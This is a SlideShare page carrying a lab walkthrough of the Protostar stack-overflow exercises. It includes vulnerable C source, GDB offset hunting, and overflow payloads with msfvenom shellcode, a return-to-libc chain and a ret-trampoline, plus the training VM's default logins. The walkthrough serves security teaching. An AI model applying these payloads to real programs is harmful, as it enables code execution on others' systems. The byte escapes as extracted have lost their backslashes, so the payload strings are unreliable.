PHPConPl 2013 - Allowed memory size of X bytes exhausted
PHPConPl 2013 - Allowed memory size of X bytes exhaustedPHPConPl 2013 - Allowed memory size of X bytes exhausted
PHPConPl 2013 - Allowed memory size of X bytes exhausted
 
CNIT 127 Ch 2: Stack overflows on Linux
CNIT 127 Ch 2: Stack overflows on LinuxCNIT 127 Ch 2: Stack overflows on Linux
CNIT 127 Ch 2: Stack overflows on Linux
 
Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545
 

Kürzlich hochgeladen

Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPathCommunity
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfIngrid Airi González
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Mark Goldstein
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesKari Kakkonen
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rick Flair
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsRavi Sanghani
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Farhan Tariq
 
Sample pptx for embedding into website for demo
Sample pptx for embedding into website for demoSample pptx for embedding into website for demo
Sample pptx for embedding into website for demoHarshalMandlekar2
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch TuesdayIvanti
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Strongerpanagenda
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...Wes McKinney
 

Kürzlich hochgeladen (20)

Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to Hero
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdf
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examples
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and Insights
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...
 
Sample pptx for embedding into website for demo
Sample pptx for embedding into website for demoSample pptx for embedding into website for demo
Sample pptx for embedding into website for demo
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch Tuesday
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
 

Stack Overflows Explained

  • 1. Exploit-Exercises.com Stack Overflows Spenser Reinhardt
  • 2. What Is A Buffer Overflow? A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information - which has to go somewhere - can overflow into adjacent buffers, corrupting or overwriting the valid data held in them.
  • 3. Tools In Use Perl – Inline perl expressions, either using $( expression ) or expression | program, depending on the need. Used to quickly GDB – GNU Debugger, allows debugging of applications, inspecting of live variables, memory, and registers. Crash dumps know as core files can also be analyzed in the same manors. Metasploit Console: In ../msf/tools Pattern_Create.rb – Creates a specialized pattern that can be used to identify how many bytes into a buffer important locations are such as EIP or variables Pattern_Offset.rb – Based on a small subset of bytes returned from overflowed buffers filled with patterns from pattern_create, this locates how far into the buffer the bytes that returned are. Venom – Creates shellcode, with the ability to change function, and encode shellcode to avoid bad characters and detection.
  • 4. Preparing Protostar In virtual console window Login User: root Pass: godmode Get an IP dhclient & ifconfig | grep “inet addr”
  • 5. Preparing Protostar Cont. Login ssh user@[IP] Pass: user Unlimit core dumps ulimit -c unlimited ulimit -a | grep core Change to bash shell /bin/bash Change to binary dir cd /opt/protostar/bin/
  • 6. Level 0 (Source) int main(int argc, char **argv) { volatile int modified; char buffer[64]; modified = 0; gets(buffer); if(modified != 0) { printf("you have changed the 'modified' variablen"); } else { printf("Try again?n"); } }
  • 7. Level 0 (Diagram) The Stack Previous Stack Frames Contains previous EIP & ESP Int modified = 0 Char buffer = 64 bytes Uninitalized stack space
  • 8. Level 0 (Solution) /opt/protostar/bin$ ./stack0 test Try again? /opt/protostar/bin$ perl -e 'print "a"x68' | ./stack0 you have changed the 'modified' variable
  • 9. Level 1 (source) int main(int argc, char **argv) { volatile int modified; char buffer[64]; if(argc == 1) { errx(1, "please specify an argumentn"); } modified = 0; strcpy(buffer, argv[1]); if(modified == 0x61626364) { printf("you have correctly got the variable to the right valuen"); } else { printf("Try again, you got 0x%08xn", modified); } }
  • 10. Level 1 The Stack (Diagram) Previous Stack Frames Contains previous EIP & ESP Int modified = 0 Modified == 0x61626364 Char buffer = 64 bytes Uninitalized stack space
  • 11. Level 1 (Solution) ./stack1 test Try again, you got 0x00000000 ./stack1 $(perl -e 'print "a"x70') Try again, you got 0x61616161 ./pattern_create.rb 70 [MSF Pattern] ./stack1 [MSF Pattern] Try again, you got 0x63413163 ./pattern_offset.rb 63413163 = 64 bytes ./stack1 $(perl -e 'print "a"x64 . "x64x63x62x61nr"') you have correctly got the variable to the right value
  • 12. Level 2 (Source) int main(int argc, char **argv) { volatile int modified; char buffer[64]; char *variable; variable = getenv("GREENIE"); if(variable == NULL) { errx(1, "please set the GREENIE environment variablen"); } modified = 0; strcpy(buffer, variable); if(modified == 0x0d0a0d0a) { printf("you have correctly modified the variablen"); } else { printf("Try again, you got 0x%08xn", modified); } }
  • 13. Level 2 The Stack (Diagram) Previous Stack Frames Contains previous EIP & ESP Int modified = 0 Modified == 0x0d0a0d0a Char buffer = 64 bytes Char *variable Uninitalized stack space
  • 14. Level 2 (Solution) ./stack2 stack2: please set the GREENIE environment variable export GREENIE=$(perl -e 'print "a"x80') ./stack2 Try again, you got 0x61616161 ./pattern_create.rb 70 [MSF Pattern] export GREENIE=[MSF locator string] ./stack2 Try again, you got 0x63413163 ./pattern_offset.rb 63413163 = 64 bytes export GREENIE=$(perl -e 'print "a"x64 . "x0ax0dx0ax0dnr"') ./stack2 you have correctly modified the variable
  • 15. Level 3 (Source) void win() { printf("code flow successfully changedn"); } int main(int argc, char **argv) { volatile int (*fp)(); char buffer[64]; fp = 0; gets(buffer); if(fp) { printf("calling function pointer, jumping to 0x%08xn", fp); fp(); } }
  • 16. Level 3 The Stack (Diagram) Previous Stack Frames Contains previous EIP & ESP Int fp = 0 Must point to win() Win() = 0x08048424 Char buffer = 64 bytes void win() { printf("code flow successfully changedn"); } fp = 0; Uninitalized gets(buffer); stack space if(fp) { printf("calling function pointer, jumping to 0x%08xn", fp); fp(); } }
  • 17. Level 3 (Solution) ./stack3 Test perl -e 'print "a"x80' | ./stack3 calling function pointer, jumping to 0x61616161 Segmentation fault ./pattern_create.rb 70 [MSF Pattern] ./stack3 - [MSF Pattern] calling function pointer, jumping to 0x63413163 ./pattern_offset.rb 63413163 = 64 bytes objdump -d ./stack3 | grep win 08048424 <win> perl -e 'print "a"x64 . "x24x84x04x08nr"' | ./stack3 calling function pointer, jumping to 0x08048424 code flow successfully changed
  • 18. Level 4 (Source) void win() { printf("code flow successfully changedn"); } int main(int argc, char **argv) { char buffer[64]; gets(buffer); }
  • 19. Level 4 The Stack (Diagram) Previous Stack Frames Contains previous EIP & ESP EIP must point to win() Win() = 0x080483f4 Char buffer = 64 bytes void win() { printf("code flow successfully changedn"); } Uninitalized fp = 0; stack space gets(buffer); if(fp) { printf("calling function pointer, jumping to 0x%08xn", fp); fp(); } }
  • 20. Level 4 (Solution) ./stack4 Test perl -e 'print "a"x80' | ./stack4 Segmentation fault ./pattern_create.rb 70 [MSF Pattern] Gdb –quiet ./stack4 Run - [MSF Pattern] Program received signal SIGSEGV, Segmentation fault. 0x63413563 in ?? () ./pattern_offset.rb 63413563 = 76 bytes objdump -d ./stack4 | grep win 080483f4 <win> perl -e 'print "a"x76 . "xf4x83x04x08"' | ./stack4 code flow successfully changed Segmentation fault
  • 21. Level 5 (Source) int main(int argc, char **argv) { char buffer[64]; gets(buffer); }
  • 22. Level 5 The Stack (Diagram) Previous Stack Frames Contains previous EIP & ESP Overwritten with nop sled and Shellcode. Current EIP – must be overwritten to point to our shellcode EIP = 0x08048424 Char buffer = 76 bytes int main(int argc, char **argv) { Uninitalized stack space char buffer[64]; gets(buffer); }
  • 23. Level 5 (Solution 1) perl -e 'print "a"x80' | ./stack5 Segmentation fault ./pattern_create.rb 80 [MSF Pattern] Gdb –-quiet ./stack5 run [MSF Pattern] Program received signal SIGSEGV, Segmentation fault. 0x63413563 in ?? () (gdb) x $esp 0xbffff7c0 ./pattern_offset.rb 63413563 = 76 bytes Location of EIP = 0xbffff760 + 76h = 0xbffff7d6
  • 24. Level 5 (Solution 2) msfvenom -p linux/x86/exec -f pl -b 'x00xff' CMD=/bin/bash PrependSet resuid=true = ~70bytes perl -e 'print "a"x76 . "xc0xf7xffxbf" . "x90"x16 . "xdbxd3xd9x74x24xf4x5dxbbx62x1axd1xfex2bxc9 xb1x0bx83xedxfcx31x5dx16x03x5dx16xe2x97x70xdaxa6xce xd7xbax3exddxb4xcbx58x75x14xbfxcex85x02x10x6dxecxbc xe7x92xbcxa8xf0x54x40x29x2ex37x29x47x1fxc4xc1x97x08 x79x98x79x7bxfd"' | ./stack5 Result: Program exits cleanly without executing a shell. Reason: /bin/dash has issues with the incoming stdin from the original Program. It must check for this issue and close automatically. This Is due to the gets() function being used. More Details: StackOverflow.com
  • 25. Level 5 (Solution 3) msfvenom -p linux/x86/exec -f pl -b 'xcox04x00xff' CMD='touch /tmp/touch' PrependSet resuid=true perl -e 'print "a"x76 . "xc0xf7xffxbf" . "x90"x16 . "xdaxd0xbbx78xe4x7ax44xd9x74x24xf4x58x29xc9xb1x0ex31x58x 17x83xc0x04x03x20xf7x98xb1xbaxfcx04xa3x68x65xddxfexefxe0xf ax69xc0x81x6cx6ax76x49x0fx03xe8x1cx2cx81x1cx0fxb3x26xdcx4 4xdcx53xbfxccx02xb3x4bx60x33xe4xc7x15xc6x99x4fxeax7fx0dx0 6x0bxb2x31"' | ./stack5 user@protostar:/opt/protostar/bin$ ls /tmp/ touch Local shell code for gets() - http://www.exploit-db.com/exploits/13357/
  • 26. Level 6 (Source) void getpath(){ char buffer[64]; unsigned int ret; printf("input path please: "); fflush(stdout); gets(buffer); ret = __builtin_return_address(0); if((ret & 0xbf000000) == 0xbf000000) { printf("bzzzt (%p)n", ret); _exit(1); } printf("got path %sn", buffer); } int main(int argc, char **argv { getpath(); }
  • 27. Level 6 The Stack (Diagram) Previous Stack Frames Current EIP Char buffer = 64 bytes Uninitalized stack space
  • 28. Level 6 The Stack (Diagram 2) This address Address of SHELLCODE Address of SHELLCODE Address of FORMATSTRING Address of execl() Address of printf() Previously EIP Char buffer = 64 bytes Uninitalized stack space
  • 29. Level 6 (Solution 1) ./pattern_create.rb 100 [MSF Pattern] Gdb –-quiet ./stack6 Run Input path please:[MSF Pattern] got path [MSF Pattern] Program received signal SIGSEGV, Segmentation fault. 0x37634136 in ?? () ./pattern_offset.rb 0x37634136 80 msfvenom -p linux/x86/exec -f pl -b 'xcox04x00xff' CMD='touch /tmp/touch' PrependSet resuid=true [SHELLCODE] ~ 80 bytes perl -e 'print "a"x80 . "xf0xf7xffxbf" . [SHELLCODE] | ./stack6 input path please: bzzzt (0xbffff7f0)
  • 30. Level 6 (Solution 2) gdb --quiet ./stack6 (gdb) break main Breakpoint 1 at 0x8048500: file stack6/stack6.c, line 27. (gdb) run Starting program: /opt/protostar/bin/stack6 Breakpoint 1, main (argc=1, argv=0xbffff864) (gdb) print printf $1 = {<text variable, no debug info>} 0xb7eddf90 <__printf> (gdb) print execl $2 = {<text variable, no debug info>} 0xb7f2e460 <*__GI_execl> export FORMATSTRING=”%3$n” export SHELLCODE=”/location/to/shellcodefile” ~/getenvaddr FORMATSTRING ./stack6 FORMATSTRING will be at 0xbffff9a7 ~/getenvaddr SHELLCODE ./stack6 SHELLCODE will be at 0xbffff9b6
  • 31. Level 6 (Solution 3) (Using altered stack6 binary) ~/stackx input path please: a 0xbffff75c got path a gdb --quiet ~/stackx (gdb) break getpath Breakpoint 1 at 0x804848a (gdb) run Starting program: /home/user/stackx Breakpoint 1, 0x0804848a in getpath () (gdb) x/4000s $esp … 0xbffff966: "/home/user/stackx" … 0xbfffffea: "/home/user/stackx"
  • 32. Level 6 (Solution 4) /home/user/stackx = 17 bytes /opt/protostar/bin/stack6 = 25 bytes Difference of = 8 bytes Shows twice in mem = 16 bytes total 80 x “a” = 80 bytes 20 for other addresses = 20 bytes Starting point of = 0xbffff75c perl -e 'printf("0x%08xn", 0xbffff75c + 20 + 80 + 16)' 0Xbffff7d0
  • 33. Level 6 (Solution 5) Printf = 0xB7EDDF90 Execl = 0xB7F2E460 $FORMATSTRING = 0xBFFFF9A8 $SHELLCODE = 0xBFFFF9B6 End of buffer (here) = 0XBFFFF7D0 BUFFER (80)| printf | execl | FORMATSTRING| SHELLCODE | SHELLCODE | here perl -e 'print "a"x80 . "x90xdfxedxb7" . "x60xe4xf2xb7" . "xa8xf9xffxbf" . "xb6xf9xffxbf"x2 . "xd0xf7xffxbf"' | ./stack6 Seg fault
  • 34. Level 7 (Source) char *getpath(){ char buffer[64]; unsigned int ret; printf("input path please: "); fflush(stdout); gets(buffer); ret = __builtin_return_address(0); if((ret & 0xb0000000) == 0xb0000000{ printf("bzzzt (%p)n", ret); _exit(1); } printf("got path %sn", buffer); return strdup(buffer); } int main(int argc, char **argv){ getpath(); }
  • 35. Level 7 (Diagram) Address of SHELLCODE Previous Stack Frames Filler buffer = 8 bytes Containsof jmp, ESP ret Address EIP & jmp, Char buffer = 80 bytes Char buffer = 80 bytes Uninitalized stack space
  • 36. Level 7 (Solution 1) ./pattern_create.rb 100 [MSF Pattern] gdb –-quiet ./stack7 input path please: [MSF Pattern] Program received signal SIGSEGV, Segmentation fault. 0x37634136 in ?? () ./pattern_offset.rb 0x37634136 80
  • 37. Level 7 (Solution 2) scp user@192.168.1.10:/opt/protostar/bin/stack7 ~/stack7 msfelfscan -j edx ~/stack7 [~/stack7] msfelfscan -p ~/stack7 [~/stack7] 0x08048492 pop ebx; pop ebp; ret 0x080485c7 pop edi; pop ebp; ret 0x080485f7 pop ebx; pop ebp; ret
  • 38. Level 7 (Solution 3) perl -e 'print "a"x80 . "x92x84x04x08" . "c"x100' > /tmp/7-test gdb --quiet ./stack7 (gdb) run < /tmp/7-test Program received signal SIGSEGV, Segmentation fault. 0x63636363 in ?? () ./pattern_create.rb 50 [MSF Pattern] perl -e 'print "a"x80 . "x92x84x04x08" . "[MSF Pattern]”’ > /tmp/7-test gdb --quiet ./stack7 (gdb) run < /tmp/7-test Program received signal SIGSEGV, Segmentation fault. 0x33614132 in ?? ()
  • 39. Level 7 (Solution 4) ./pattern_offset.rb 0x33614132 8 perl -e 'print "a"x80 . "x92x84x04x08" . "C"x8 . "D"x4' > /tmp/7-test gdb --quiet ./stack7 (gdb) run < /tmp/7-test Starting program: /opt/protostar/bin/stack7 < /tmp/7-test Program received signal SIGSEGV, Segmentation fault. 0x44444444 in ?? () msfvenom -p linux/x86/exec -f pl -b 'xcox04x00xff' CMD='touch /tmp/touch' PrependSet resuid=true [MSF Shellcode] export SHELLCODE=`perl -e 'print “[MSF Shellcode]"'` ~/getenvaddr SHELLCODE ./stack7 SHELLCODE will be at 0xbffff960
  • 40. Level 7 (Solution 4) perl -e 'print "a"x80 . "x92x84x04x08" . "C"x8 . "x60xf9xffxbf"' | ./stack7 input path please: got path aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a��aaaaaaaaaaaa��CCCCCCCC`��� ls /tmp/ touch
  • 41. Questions? Thanks! Exploit-exercises.com – Virtual machine creators Mattandreko.com - Tutorials Hacking: The Art of Exploitation – Jon Erickson